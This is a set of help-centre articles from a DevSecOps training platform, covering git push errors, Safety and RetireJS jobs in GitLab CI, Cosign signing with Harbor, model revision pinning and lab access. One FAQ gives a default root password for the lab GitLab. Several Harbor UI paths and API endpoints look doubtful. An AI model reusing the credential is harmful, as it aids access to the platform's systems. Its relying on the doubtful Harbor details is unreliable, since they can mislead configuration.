
Technical Support

Assistance for enrolled learners with labs, content, and troubleshooting.
By Restu Muzakir and 2 others
58 articles

Learner Support

🚀 Quick Summary
- 💬 Mattermost community for quick questions
- AI Chatbot for your technical questions
- 🎛️ Student portal for self-service
- ⚡ Priority given to urgent issues
- 👥 Support available from instructors, TAs, and peers

💬 Real-Time Community Support (Mattermost)

Our Mattermost community channel is available at https://chat.practical-devsecops.com/practical-devsecops/channels/town-square

⚡ Real-time interaction with:
- 👨‍🏫 Instructors (24/7 coverage)
- 👨‍🏫 Teaching assistants
- 👥 Fellow students worldwide

🎯 Ideal for:
- ⚡ Quick questions
- 📚 Course content clarifications
- 🧪 Lab exercise discussions
- 🔀 Exploring different approaches to problems
- ❓ Clarifying personal doubts or questions

🤝 Benefits:
- 💭 Multiple perspectives on the same problem
- 🧠 Deeper understanding beyond quick fixes
- 🌐 Networking and professional DevSecOps connections

🎛️ Self-Service Student Portal

Your student portal gives you immediate access to:

⚙️ Account & learning management:
- 📊 Track course progress
- ⚙️ Update account settings
- 🧗 Access invoices and certificates
- 📅 Schedule exams
- ➕ Request lab extensions

📚 Helpful resources:
- 📋 Exam guides
- 🧪 Lab documentation
- ❓ Frequently asked questions

👥 For organizations: Admins get additional team management tools.

💡 Pro Tip: Always check the portal first — many answers are available instantly without waiting!

Common Question:

Q1: Where do I access the Mattermost channel?
A: We have now moved from Mattermost to Chatwoot. You can ask your questions directly using the "Chat with support" option on the portal.

Last updated on Mar 13, 2026

Common Technical Issues

🚀 Quick Summary:
- 🌐 Use Chrome/Firefox browsers
- 🧽 Clear cache for access issues
- 🛡️ Check firewall settings
- 🚫 Disable VPN if needed
- 📶 10+ Mbps internet recommended
- 🔑 Password reset via email

🧪 Most Common Issue: Lab Access

Lab access issues often stem from network/browser settings, not platform problems:

🌐 Browser Compatibility
- ✅ Use supported browsers: Chrome and Firefox
- 🧽 Clear browser cache and cookies — outdated session data blocks authentication
- ⚙️ Ensure JavaScript is enabled
- 🚫 Check that ad blockers aren't interfering

🛡️ Network Troubleshooting
- 🏢 Corporate networks: Verify firewall rules allow our cloud connections
- 🚫 VPN issues: Temporarily disable to identify routing problems
- 📶 Connection quality: Ensure stable internet access

🎬 Video Playback Issues

Typically related to bandwidth or browser capabilities:
- 📶 Bandwidth requirements: 10+ Mbps for optimal HD streaming
- 🔄 If experiencing buffering:
  - 📉 Reduce the playback quality setting
  - ⏰ View during off-peak hours (less network congestion)
- 📺 Streaming-only design ensures the most current content
- 🚫 No downloads available — always up-to-date materials

🔑 Account Access Problems

Often simple issues with easy solutions:

📞 Password Reset
- 📧 The process sends instructions to your registered email. Email subject line: "Confirmation of Course Enrollment"
- ⏰ Didn't receive the email within minutes? Check your spam folder
- 🏢 Organizational filters sometimes miscategorize automated messages

✉️ Email Verification
- ⚠️ Required for account activation
- ✅ Ensure you've completed this step after registration

🔒 Account Lockout
- 📞 Multiple failed attempts? Contact support for recovery
- 🔒 We follow industry-leading security best practices to protect your account

🎬 Course Access Issues
- After enrolling, check your inbox for "Confirmation of Course Enrollment" – this email contains instructions to schedule your start date. Since the course includes 60 days of lab access, you choose when to begin.
- Haven't received it? Check your spam folder first, then contact support.

🏷️ How to Reset Lab Machines
- Refresh the exercise page and follow the instructions below. Please note that you will lose your data, so make sure you have already backed it up.
- Click the Reset my environment button, and a pop-up will appear. Read it carefully and click Yes, Reset my environment. The machine will then provision.

✅ Whitelist these domains (and subdomains) and open ports 80 and 443 (HTTP/HTTPS, websocket):
- *.practical-devsecops.training
- chat.practical-devsecops.com
- *.lab.practical-devsecops.training
- vimeo.com
- https://chnl.portal.practical-devsecops.training

💡 Pro Tip: Most issues have simple solutions - try basic troubleshooting first!

Common problem:

Q1: My GitLab / Dojo / Prod / Docker can't be accessed
A: Please ensure the following:
- You have a stable internet connection, then try to open the platform again.
- Lab environment machines are properly provisioned (not red).
- Reload or reset the lab and try the lab exercise again.
- If the issue persists, please contact the support team.

Last updated on Jan 27, 2026

Troubleshooting GitHub Repository Issues & Understanding CI/CD Tool Policies in DevSecOps Exams

Troubleshooting GitHub Repository Issues & Understanding CI/CD Tool Policies in DevSecOps Exams

When you're preparing for a DevSecOps certification, the last thing you want is to be stuck on a GitHub error or unsure about which CI/CD platform is allowed in the exam environment. This article consolidates the most common repository-related problems—such as failed git push commands and "repository not found" messages—and clarifies the CI/CD tools you'll encounter during the exam. Follow the step-by-step guidance, practical examples, and best-practice tips to keep your labs running smoothly.

Table of Contents
1. Why git push -u origin main Might Fail
2. Fixing "Repository Not Found" Errors
3. CI/CD Tool Policy for DevSecOps Exams
4. Quick Reference Checklist
5. Common Questions & Pro Tips

1. Why git push -u origin main Might Fail

The command git push -u origin main is the standard way to publish your local main branch to a remote repository and set the upstream tracking reference. If the push hangs or returns an error, consider the following typical causes.

1.1. Mismatched Repository URL
- Symptom: fatal: remote origin already exists or remote: Repository not found.
- Root Cause: The URL configured for origin points to a different repository (e.g., a stale clone of django.nv, dvpa, or a Terraform project).
- Solution: Verify and, if necessary, update the remote URL.

  # Show current remote URL
  git remote -v

  # Correct it (replace <USERNAME> and <REPO>)
  git remote set-url origin https://github.com/<USERNAME>/<REPO>.git

1.2. Incorrect Authentication (Username / Password)
- Symptom: remote: Invalid username or password.
- Root Cause: GitHub no longer accepts password authentication for Git over HTTPS. You must use a Personal Access Token (PAT) with the appropriate scopes (repo, workflow, etc.).
- Solution:
  1. Generate a new PAT in GitHub Settings → Developer settings → Personal access tokens.
  2. Store it securely (e.g., using a credential manager).
  3. When prompted for a password, paste the PAT instead.

1.3. Expired or Revoked PAT
- Symptom: Same as above, but you know the token worked previously.
- Solution: Re-create the token with the same scopes and replace the old one in your credential store.

1.4. Public Repository with Secret-Scanning Enforcement
- Symptom: remote: error: secret scanning blocked this push (a related but separate error, remote: error: GH001: Large files detected, points to oversized files rather than secrets).
- Root Cause: GitHub's secret-scanning feature blocks pushes that contain exposed secrets (API keys, passwords, etc.) in public repos such as django.nv.
- Solution:
  - Scan your commit history locally with tools like git-secrets, truffleHog, or GitGuardian.
  - Remove or rotate any leaked secrets, then force-push the cleaned history (if allowed by the exam's policies).

1.5. Branch Naming Mismatch
- Symptom: error: src refspec main does not match any.
- Root Cause: Your local branch is named master or something else, not main.
- Solution: Either rename the branch or push the correct branch name.

  git branch -m master main   # rename locally
  git push -u origin main     # push again

2. Fixing "Repository Not Found" Errors

When Git returns "repository not found" it's usually a configuration or permission issue.

| Possible Issue | How to Diagnose | Fix |
|----------------|-----------------|-----|
| Wrong URL | Run git remote -v and compare with the URL shown on GitHub. | Update with git remote set-url origin <correct-url> |
| Missing Access Rights | Verify you can open the repo in a browser using the same account. | Request collaborator access or fork the repo to your account. |
| Organization/Team Restrictions | Some exam repos are hosted under a private organization. | Ensure you're logged in with the correct organization account. |
| Two-Factor Authentication (2FA) Enabled | Git over HTTPS without a PAT will fail. | Use a PAT as described in Section 1.2. |
| Deleted or Renamed Repo | Check the repo's page; a 404 indicates it's gone. | Ask the course facilitator for the new repository location. |

3. CI/CD Tool Policy for DevSecOps Exams

3.1. Which Platforms Are Allowed?
- GitLab – the only CI/CD system used in all official exams.
- Jenkins – not available in the exam environment.
- CircleCI – also not available.

All exam pipelines are pre-configured in GitLab CI/CD (.gitlab-ci.yml). You'll be expected to interact with GitLab runners, view job logs, and troubleshoot pipeline failures using only GitLab's UI and CLI tools.

3.2. Why GitLab Only?
- Standardized Environment: Guarantees that every candidate works with the same runner images, variables, and security policies.
- Built-in Security Scanning: GitLab includes secret detection, container scanning, and dependency scanning out-of-the-box, aligning with the DevSecOps focus of the certification.
- Simplified Grading: Automated assessment scripts can reliably parse GitLab pipeline results.

Tip: If you're accustomed to Jenkins or CircleCI, spend a few hours exploring the GitLab CI/CD documentation before the exam. The syntax (stages, jobs, variables) is similar, but the UI differs.

4. Quick Reference Checklist

Before you run git push or start a pipeline, run through this checklist:
1. Confirm Remote URL – git remote -v matches the GitHub repo you see in the browser.
2. Validate Authentication – PAT is stored and not expired; 2FA is accounted for.
3. Check Branch Name – You're on main (or the branch the exam expects).
4. Scan for Secrets – Run git secrets --scan or similar.
5. Verify Repo Visibility – Public repos may have secret-scanning rules; private repos avoid this but require proper permissions.
6. Know the CI/CD Platform – Only GitLab pipelines are evaluated; no Jenkins or CircleCI steps.

5. Common Questions & Pro Tips

Q1: Can I use SSH instead of HTTPS for Git operations?
A: Yes, but you must add your SSH public key to your GitHub account.
In the exam, the provided instructions usually specify HTTPS with a PAT, so follow those to avoid confusion.

Q2: What if I accidentally push a secret?
A: Immediately revoke the exposed credential, generate a new one, and replace the secret in the repository using git filter-branch or BFG Repo-Cleaner. Then push the cleaned history.

Q3: My pipeline fails with "secret detection" even though I didn't add any secrets.
A: GitLab's secret scanner can flag patterns that look like keys (e.g., AKIA...). Rename variables or use GitLab's variable masking feature (Settings → CI/CD → Variables, "Mask variable") to suppress false positives.

Q4: Do I need to install any extra tools on the exam machine?
A: No. All required tools (Git, Docker, GitLab Runner) are pre-installed. You only need to use the command line and the web UI.

Q5: What is the default credential to access the GitLab CE web portal?
A: The default credential for GitLab is: username: root and password: pdso-training

Pro Tip: Use Git's Verbose Mode
Add -v to any Git command (git push -v) to see detailed HTTP request/response data. This often reveals authentication problems faster than the generic error message.

Pro Tip: Bookmark the Exam GitLab Instance
Keep the URL of the exam's GitLab instance handy. It typically looks like https://gitlab.example.com/<course>/<project>. Direct navigation saves time when you need to view pipeline logs.

Wrap-Up

By systematically verifying your remote configuration, authentication method, and repository contents, you can eliminate the majority of Git push failures. Remember that GitLab is the exclusive CI/CD platform for DevSecOps exams, so focus your practice on its pipelines and built-in security scans. Keep this article as a quick-reference guide, and you'll be better prepared to troubleshoot on the fly and stay within exam policies. Good luck, and happy coding!
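Step 1 of the checklist (confirming the remote URL) is easy to sanity-check in code. Below is a minimal, hypothetical helper — not part of any official tooling — that extracts the owner and repository name from a GitHub HTTPS remote so you can compare them against what you see in the browser:

```python
import re

def parse_github_remote(url: str) -> tuple[str, str]:
    """Extract (owner, repo) from a GitHub HTTPS remote URL,
    e.g. https://github.com/<USERNAME>/<REPO>.git"""
    m = re.match(r"https://github\.com/([^/]+)/([^/]+?)(?:\.git)?/?$", url)
    if not m:
        raise ValueError(f"Not a GitHub HTTPS remote: {url}")
    return m.group(1), m.group(2)

# Compare this against the repo you see in the browser.
print(parse_github_remote("https://github.com/alice/django.nv.git"))
# → ('alice', 'django.nv')
```

Feed it the URL reported by git remote -v; if the owner or repo name differs from the one in your browser, fix it with git remote set-url origin as shown in Section 1.1.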

Last updated on Jan 27, 2026

Integrating Security Scanning Tools into GitLab Pipelines – A Practical Guide

Integrating Security Scanning Tools into GitLab Pipelines – A Practical Guide

Security-focused CI/CD pipelines are a cornerstone of modern DevSecOps. This article walks you through the most common hurdles learners face when adding Safety (Python dependency scanner) and RetireJS (JavaScript component analyzer) to GitLab pipelines. You'll learn how to interpret version specifiers, structure pipeline jobs, filter high-severity findings, and correctly use the supporting files (requirements.txt, package.json, .retireignore.json).

1. Why the "unpinned requirement" warning appears in Safety

The warning explained

When you run the Safety step in the Fix issues reported by Safety lab you may see:

  Warning: unpinned requirement 'Django' found in requirements.txt, unable to check.

This is not an error; it's a warning that Safety cannot verify a dependency that isn't pinned to a specific version.

Understanding Python version specifiers

| Specifier | Meaning | Example outcome |
|-----------|---------|-----------------|
| Django==2.2.25 | Install exactly version 2.2.25 | Only 2.2.25 is used |
| Django>=2.2.25 | Install any version ≥ 2.2.25 | 2.2.25, 2.3.0, 3.0.0 … |
| Django~=2.2.25 | Install the latest patch release within the same minor series | 2.2.25, 2.2.26, 2.2.27 … but not 2.3.0 |

The tilde specifier (~=) is intentional – it tells pip to fetch the newest patch release while staying within the 2.2.x line. If you prefer a fully pinned version, replace ~= with ==.

Reference: PEP 440 – Version Specifiers

2. Embedding Safety into a GitLab pipeline

Two-job pattern (recommended)

Safety requires a Docker image that contains the safety binary, while your unit-test job needs a Python image. Keeping them separate avoids image-conflict issues.
  # .gitlab-ci.yml
  stages:
    - test

  # 1️⃣ Unit-test job – runs your Python code
  test:
    stage: test
    image: python:3.6
    before_script:
      - pip3 install --upgrade virtualenv
    script:
      - virtualenv env
      - source env/bin/activate
      - pip install -r requirements.txt
      - python manage.py test taskManager

  # 2️⃣ Safety scanning job – uses the official Safety image
  oast:
    stage: test
    script:
      - docker pull hysnsec/safety   # fetch the scanner
      - docker run --rm -v $(pwd):/src hysnsec/safety check -r requirements.txt --json > oast-results.json
    artifacts:
      paths: [oast-results.json]
      when: always
    allow_failure: true

Why two jobs?
- Different base images (python:3.6 vs. hysnsec/safety).
- Clear separation of concerns – unit testing vs. security scanning.
- Each job can fail independently without breaking the other stage.

If you see docker: command not found, verify that the GitLab Runner is configured with Docker-in-Docker (DinD) or that you're using a shared runner that supports Docker commands.

3. Software Component Analysis with RetireJS

Goal of the challenge

Identify high-severity JavaScript vulnerabilities, mark them as false positives (FPs), and store those markings in a .retireignore.json file.

Step-by-step workflow

1. Run RetireJS and generate JSON output

     script:
       - npm install              # installs project deps from package.json
       - npm install -g retire    # installs the retire CLI globally
       - retire --outputformat json --outputpath retire_output.json

   npm install reads the package.json in the current directory and installs every dependency listed under dependencies and devDependencies.

2. Filter high-severity findings

   Use jq (a lightweight JSON processor) to extract only the records you need:

     jq '.data[].results[]' retire_output.json | grep -E 'component|version|high'

   What it does:
   - jq '.data[].results[]' walks into the results array of each scanned file.
   - grep -E 'component|version|high' prints lines containing the component name, its version, or the word "high".
   The result is a list of vulnerable components with high severity.

3. Create the .retireignore.json file

   For every high-severity entry you decide is a false positive, add an object to the ignore file:

     [
       {
         "component": "qs",
         "version": "0.6.6",
         "justification": "Vulnerable class is not used"
       },
       {
         "component": "handlebars",
         "version": "4.0.5",
         "justification": "Vulnerable class is not used"
       }
     ]

   The structure follows the RetireJS specification: you can ignore by component, component + version, or by path (e.g., node_modules).

4. Optional: Download the JSON locally

   If you prefer a GUI editor, copy retire_output.json from the runner's workspace to your machine (e.g., via the GitLab UI "Download artifacts" button) and edit it with Sublime, VS Code, or any text editor.

4. Where do package.json and requirements.txt come from?

- package.json – Part of the Node.js source code you are scanning. It lists JavaScript libraries under dependencies and devDependencies. The npm install command reads this file and materialises the node_modules folder.
- requirements.txt – The Python counterpart located in the Python project's repository. It enumerates third-party packages (e.g., Django~=2.2.25). Safety reads this file to perform its vulnerability check.

Both files are checked into the lab repository; they are not generated by Docker images.

5. Tips & Common Questions

| Issue | Quick Fix |
|-------|-----------|
| docker: command not found in Safety job | Ensure the runner has Docker enabled (DinD) or use a shared runner that provides Docker. |
| "Warning: unpinned requirement" persists | Pin the version with == or keep ~= and accept the warning (it does not stop the pipeline). |
| No high-severity findings in RetireJS output | Verify you are scanning the correct directory (npm install must finish first) and that the target libraries have known CVEs. |
| .retireignore.json not honoured | Confirm the file is placed at the repository root and follows proper JSON syntax (no trailing commas). |
| Artifacts not appearing after Safety scan | Add an artifacts: section to the job (as shown above) and make sure when: always is set if you want results even on failure. |

6. Conclusion

Integrating Safety and RetireJS into GitLab pipelines enhances your DevSecOps posture by catching vulnerable third-party components early. Remember to:
- Use explicit version specifiers for Python dependencies.
- Separate jobs when they require different Docker images.
- Leverage jq to isolate high-severity findings and create a clean .retireignore.json.
- Understand that package.json and requirements.txt are part of the source code you are scanning.

With these practices in place, your pipelines will reliably test functionality and enforce security standards, keeping your applications safe and compliant. Happy scanning!
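The jq + grep filter from section 3 can also be done in a few lines of Python, which is handy when jq isn't available on the runner. The sketch below assumes the RetireJS JSON layout referenced above (a data array whose entries hold results, with severities under each result's vulnerabilities); verify the field names against your own retire_output.json, and note the sample input is illustrative, not real scanner output:

```python
import json

def high_severity(report: dict) -> list[tuple[str, str]]:
    """Return (component, version) pairs whose vulnerabilities
    include at least one 'high' severity entry."""
    hits = []
    for entry in report.get("data", []):
        for result in entry.get("results", []):
            sevs = [v.get("severity") for v in result.get("vulnerabilities", [])]
            if "high" in sevs:
                hits.append((result["component"], result["version"]))
    return hits

# Illustrative sample in the RetireJS output shape.
sample = {
    "data": [
        {"results": [
            {"component": "handlebars", "version": "4.0.5",
             "vulnerabilities": [{"severity": "high"}]},
            {"component": "jquery", "version": "3.6.0",
             "vulnerabilities": [{"severity": "low"}]},
        ]}
    ]
}
print(high_severity(sample))  # → [('handlebars', '4.0.5')]
```

The returned pairs map directly onto the component/version fields expected by .retireignore.json entries.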

Last updated on Jan 06, 2026

Troubleshooting Lab Access and Platform Login Issues for DevSecOps Learners

Troubleshooting Lab Access and Platform Login Issues for DevSecOps Learners

If you're enrolled in a DevSecOps course and can't see your course, access your labs, or connect to essential platforms like GitLab, Dojo, Production, or Docker, you're not alone. This guide walks you through the most common reasons these problems occur and provides step-by-step solutions so you can get back to learning quickly.

Introduction

A smooth learning experience hinges on reliable access to course content and hands-on labs. However, connectivity hiccups, provisioning delays, or simple configuration oversights can block progress. By following the troubleshooting steps outlined below, you'll be able to verify your enrollment, confirm that lab environments are ready, and resolve platform-specific login issues without needing to wait for support.

1. My Course Is Not Listed in the Dashboard

Why it Happens
- Incorrect email address used during registration.
- Course activation delay – the platform may need up to 1 hour after the scheduled start time to publish the course.

How to Fix It
1. Confirm the email you used
   - Log in to the learning portal.
   - Check the email displayed in the top-right corner.
   - If it differs from the address you used to enroll, log out and sign in with the correct email.
2. Wait for the activation window
   - Courses typically appear within 1 hour of the announced start time.
   - Refresh the dashboard every 15 minutes during this window.
3. Contact support if the course is still missing
   - Provide:
     - Your full name and enrollment ID.
     - The email address you used to register.
     - The exact course name and scheduled start time.

Tip: Keep a screenshot of the empty dashboard page; it speeds up support resolution.

2. I Can't Access My Labs

Common Causes
- Wrong enrollment email (same root cause as above).
- Lab environment not yet provisioned (the status indicator appears red).
- Network instability or firewall restrictions.

3. I Can't Access GitLab, Dojo, Production, or Docker Environments

These platforms are essential for completing hands-on exercises. Follow the checklist below to troubleshoot access issues.

Checklist
1. Internet Connectivity
   - Test by visiting a public website (e.g., https://www.google.com).
   - If the page fails to load, restart your router or switch to a different network.
2. Lab Machine Health
   - Confirm the lab VM status is green (not red).
   - If the VM is red, the underlying infrastructure may be experiencing an outage; wait a few minutes and retry.
3. Platform-Specific Steps
   - GitLab
     - Ensure you are using the link provided in the lab instructions.
     - Clear browser cookies for GitLab and try again.
   - Dojo
     - Verify the Dojo URL matches the one listed in the lab (typos are common).
4. Reload or Reset
   - After confirming the above, click Reload on the lab toolbar.
   - If the issue remains, use Reset Lab to re-initialize the environment.
5. Contact Support
   - Provide:
     - Platform name (GitLab, Dojo, etc.).
     - Exact error message or screenshot.
     - Lab ID and timestamp of the failure.

Common Questions & Quick Tips

| Question | Quick Answer |
|----------|--------------|
| Why does my course appear after I log in with a different email? | The system ties course enrollment to the email used at purchase. Switching to that address resolves the issue. |
| My lab stays red for more than 15 minutes. What now? | This indicates a provisioning failure. Restart the environment. If the issue still persists, you can contact the support team via the Chat with support button with the headset icon. |
| Do I need VPN to access the labs? | No. In fact, VPNs can sometimes block the required ports. Use a direct internet connection. |

Conclusion

Access problems can be frustrating, but most are solvable with a systematic check of enrollment details, lab provisioning status, and network conditions.
By using the troubleshooting steps in this article, you'll spend less time waiting and more time mastering DevSecOps concepts. Keep this guide handy, and don't hesitate to contact support when you need a deeper dive.

Last updated on Mar 13, 2026

Understanding Cosign Key Trust in Harbor and How to Use `revision_id` for Model Versioning

Understanding Cosign Key Trust in Harbor and How to Use revision_id for Model Versioning

In modern DevSecOps pipelines, Cosign is the go-to tool for signing container images, while Harbor acts as a trusted registry that validates those signatures. Learners often wonder how Harbor can "trust" a key that you generate on your own laptop, and they also encounter the revision_id field when working with AI/ML models in labs. This article demystifies both concepts, explains the underlying mechanics, and shows you where to find the exact revision_id for a model hosted on Hugging Face.

Table of Contents
1. Why Does Harbor Trust a Self-Signed Cosign Key?
2. How Cosign Signing Works – A Quick Walkthrough
3. What Is revision_id and Why It Matters
4. Locating the revision_id of a Hugging Face Model
5. Practical Example: Signing an Image and Pinning a Model Version
6. Common Questions & Tips

Why Does Harbor Trust a Self-Signed Cosign Key?

Even though the key pair you generate with Cosign is technically self-signed (there is no external certificate authority), Harbor can still verify signatures because trust is established by explicit key registration, not by a third-party issuer.

Key Points
- Ownership Declaration: By uploading the public key to Harbor, you tell the registry, "I am the owner of the matching private key."
- Private Key Confidentiality: The private key never leaves your workstation; it is used only to create signatures.
- Verification Only: Harbor uses the stored public key solely to verify that a signature was produced by the corresponding private key. It cannot generate new signatures.
- Policy Enforcement: Harbor can be configured with policies (e.g., "only accept images signed with keys listed in the trusted-key store"). As long as the public key appears in that store, any image signed with the matching private key is accepted.

Think of the public key like a government-issued ID that you present at an airport.
The ID isn't "signed" by a separate authority, but the airport trusts it because it follows a known verification process.

How Cosign Signing Works – A Quick Walkthrough

1. Generate a key pair on your development machine

     cosign generate-key-pair

   - cosign.key → private key (kept secret)
   - cosign.pub → public key (shared with Harbor)

2. Upload the public key to Harbor
   - In the Harbor UI, navigate to Administration → Interoperability → Notary V2 (or the "Signature Trust" section) and add cosign.pub.

3. Sign a container image

     cosign sign --key cosign.key myregistry.example.com/myapp:1.2.3

4. Push the signed image to Harbor.

Harbor automatically verifies the signature using the stored public key. If the verification succeeds, the image is marked as trusted and can be promoted through your CI/CD pipeline.

What Is revision_id and Why It Matters

When you work with pre-trained models from platforms like Hugging Face, the underlying model files can change over time (bug fixes, new weights, licensing updates). To guarantee reproducibility in labs and exams, you need a stable reference to a specific version of the model.

- revision_id: A unique identifier (usually a Git commit SHA) that pins the model to an exact snapshot in the repository.
- Why pin it?
  - Prevents breaking changes when the model author pushes updates.
  - Ensures that every learner runs the same code and gets identical inference results.
  - Makes debugging easier because the exact code base is known.

In practice, you add revision_id to your requirements.txt, Dockerfile, or pipeline configuration to lock the model version.

Locating the revision_id of a Hugging Face Model

1. Open the model's page on huggingface.co (e.g., https://huggingface.co/facebook/opt-125m).
2. Click the "Files and versions" tab.
3. Locate the commit hash displayed near the top of the file list – this is the revision_id. It is a 40-character hexadecimal string, e.g., a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0.
4. Use that string in your code:

     from transformers import AutoModelForCausalLM, AutoTokenizer

     model_name = "facebook/opt-125m"
     revision_id = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0"

     tokenizer = AutoTokenizer.from_pretrained(model_name, revision=revision_id)
     model = AutoModelForCausalLM.from_pretrained(model_name, revision=revision_id)

Tip: Some repositories also expose the revision_id via the API endpoint https://huggingface.co/api/models/<repo_id>. Look for the sha field in the JSON response.

Practical Example: Signing an Image and Pinning a Model Version

Below is a concise end-to-end scenario that combines both concepts:

  # 1️⃣ Generate Cosign keys (once per developer)
  cosign generate-key-pair

  # 2️⃣ Register the public key in Harbor (UI step)

  # 3️⃣ Build a Docker image that includes a specific model version
  cat > Dockerfile <<'EOF'
  FROM python:3.11-slim
  RUN pip install torch transformers
  ENV MODEL_NAME=facebook/opt-125m
  ENV REVISION_ID=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
  RUN python - <<PY
  from transformers import AutoModelForCausalLM, AutoTokenizer
  tokenizer = AutoTokenizer.from_pretrained("$MODEL_NAME", revision="$REVISION_ID")
  model = AutoModelForCausalLM.from_pretrained("$MODEL_NAME", revision="$REVISION_ID")
  print("Model loaded successfully")
  PY
  EOF

  docker build -t myregistry.example.com/nlp/opt:latest .
  docker push myregistry.example.com/nlp/opt:latest

  # 4️⃣ Sign the image
  cosign sign --key cosign.key myregistry.example.com/nlp/opt:latest

- Result: Harbor verifies the signature using the public key you uploaded.
- Result: All learners pulling myregistry.example.com/nlp/opt:latest will use the exact same model snapshot defined by revision_id.

Common Questions & Tips

| Question | Answer |
|----------|--------|
| Do I need a CA to use Cosign? | No. Cosign relies on asymmetric cryptography; the trust anchor is the public key you register in Harbor. |
| Can I rotate a Cosign key? | Yes. Generate a new key pair, update the public key in Harbor, and re-sign any images you want to trust under the new key. |
| What if the model author deletes the commit referenced by revision_id? | The model becomes unavailable through that exact revision. In practice, Hugging Face keeps all commits, but you can always fork the repository to preserve the snapshot. |
| Is revision_id the same as a tag? | Not exactly. A tag is a human-readable label (e.g., v1.0). revision_id is the immutable commit SHA that the tag points to. Pinning by SHA guarantees immutability. |
| How do I list all trusted keys in Harbor? | In Harbor UI: Administration → Interoperability → Notary V2. You can also query the REST API: GET /api/v2.0/trust/policies. |
| Can I automate key registration? | Yes. Harbor's API allows you to POST a public key to /api/v2.0/trust/policies. Include this step in your CI pipeline for repeatable setups. |

Quick Tips
- Store your private key in a secret manager (e.g., HashiCorp Vault, Azure Key Vault) rather than on disk.
- Version-control your revision_id in a versions.yaml file so that updates are auditable.
- Enable Harbor's "signature enforcement" policy to reject unsigned images automatically.
- Validate the model checksum (e.g., SHA256) after download to catch any tampering beyond the revision_id.

Wrap-Up

Harbor's trust model for Cosign hinges on explicit public-key registration, not on traditional certificate authorities. By keeping the private key secret and sharing the public key with Harbor, you create a reliable chain of trust for your container images. Meanwhile, the revision_id field is your safety net for AI/ML model reproducibility, allowing you to lock in an exact commit from Hugging Face (or any Git-backed model hub). Knowing where to locate the SHA and how to embed it in your pipelines ensures that every learner, auditor, or production system works with the same model version, eliminating "it works on my machine" surprises.
Armed with these concepts, you can confidently build secure, reproducible DevSecOps labs that combine signed container images with pinned model versions—key ingredients for modern, trustworthy software delivery.
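The API tip above (reading the sha field from https://huggingface.co/api/models/<repo_id>) can be scripted. This is a minimal sketch: the sample payload below is illustrative only, not a real API response, and a real call would fetch the endpoint over HTTPS first:

```python
import json

def extract_revision_id(api_response_body: str) -> str:
    """Pull the commit SHA (the 'sha' field) out of a Hugging Face
    /api/models/<repo_id> JSON response body."""
    return json.loads(api_response_body)["sha"]

def looks_like_commit_sha(s: str) -> bool:
    """A Git commit SHA is exactly 40 hexadecimal characters."""
    return len(s) == 40 and all(c in "0123456789abcdef" for c in s.lower())

# Illustrative payload only — not a real API response.
sample = '{"modelId": "facebook/opt-125m", "sha": "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0"}'
sha = extract_revision_id(sample)
print(sha, looks_like_commit_sha(sha))
# → a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0 True
```

Validating the 40-hex-character shape before pinning catches the common mistake of copying a tag name (e.g., v1.0) instead of the immutable commit SHA.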

Last updated on Jan 06, 2026

Technical Support Guide: Resolving Common Lab Environment Issues in DevSecOps Courses

Technical Support Guide: Resolving Common Lab Environment Issues in DevSecOps Courses

Whether you're preparing for a DevSecOps certification exam or working through hands-on labs, a smooth lab environment is essential. This guide consolidates the most frequently reported problems—such as 404 errors, lost internet connectivity, and file-download hurdles—and provides clear, step-by-step solutions so you can stay focused on learning rather than troubleshooting.

Table of Contents
1. Understanding the "404 – Not Found" Message on CASP-PM Machines
2. What to Do When Your Internet Connection Drops During an Exam
3. Downloading Files from the DevSecOps-Box Instance
4. Downloading Files from the Control-Plane Instance
5. Quick Tips & Best Practices

1. Understanding the "404 – Not Found" Message on CASP-PM Machines

Why the 404 Error Appears

A 404 status code does not indicate that the CASP-PM machine is missing. Instead, it confirms that the machine is reachable but the specific URL you requested does not exist.

How to Access CASP-PM Correctly

Use the predefined entry points that are guaranteed to be available:

| Path | Full URL Example |
|------|------------------|
| Home | https://casp-pm-<MACHINE_ID>.lab.practical-devsecops.training/home |
| Login | https://casp-pm-<MACHINE_ID>.lab.practical-devsecops.training/login |

Steps to Reach the Home Page
1. Locate your unique <MACHINE_ID> (displayed on the lab dashboard or in the welcome email).
2. Replace <MACHINE_ID> in the URL pattern above.
3. Open the URL in a modern browser (Chrome, Edge, or Firefox).

If you still encounter a 404, double-check the machine ID for typos and ensure you are using HTTPS for the /home and /login endpoints.

2. What to Do When Your Internet Connection Drops During an Exam

Immediate Impact
- Disconnection: Your browser session is terminated, and you lose real-time access to the lab machines.
- Machine State: The virtual machines retain their current state—no automatic reset occurs.
Re‑connection Procedure
1. Restore Connectivity – Switch back to a stable network (Wi‑Fi, wired Ethernet, or a stronger mobile data signal).
2. Return to the Cloud Lab Portal – Navigate to the same exam URL you used before.
3. Authenticate Again – Log in with your exam credentials when prompted.
4. Resume Work – You will be redirected to the same lab environment, and all previous changes remain intact.

Inactivity Timeout
- 30‑minute rule: If the disconnection lasts longer than 30 minutes, the platform may automatically terminate the instance to free resources.
- Result: The machine will be reset, and you will need to restart the exercise from the beginning.

Recommendations to Minimize Disruptions
- Prefer Wi‑Fi or wired connections over mobile data when possible.
- Close bandwidth‑heavy applications (e.g., video streaming) while the exam is active.
- Keep a backup power source (portable charger or UPS) for laptops.
- Test your connection a few minutes before the exam by loading a non‑critical web page.

3. Downloading Files from the DevSecOps‑Box Instance

The DevSecOps‑Box is a pre‑configured Ubuntu VM that hosts course materials, scripts, and sample data. To retrieve files quickly, you can spin up a temporary HTTP server.

Step‑by‑Step Instructions
1. Open a terminal inside the DevSecOps‑Box machine.
2. Start the HTTP server on port 80:

       python3 -m http.server 80

   Tip: If port 80 is already in use, you can select another port (e.g., 8080) and adjust the URL accordingly.
3. Find your Machine ID (if you don’t already know it). Ask the support bot or check the lab dashboard; the ID appears in the instance name, e.g., devsecops-box-5f2a3c.
4. Access the file list from any browser on your local computer:

       https://devsecops-box-<MACHINE_ID>.lab.practical-devsecops.training
5. Download the required files by clicking the links or using wget/curl:

       wget https://devsecops-box-<MACHINE_ID>.lab.practical-devsecops.training/<filename>

Security Note
- The temporary server runs without authentication; only share the URL with yourself and close the server (Ctrl+C) once downloads are complete.

4. Downloading Files from the Control‑Plane Instance

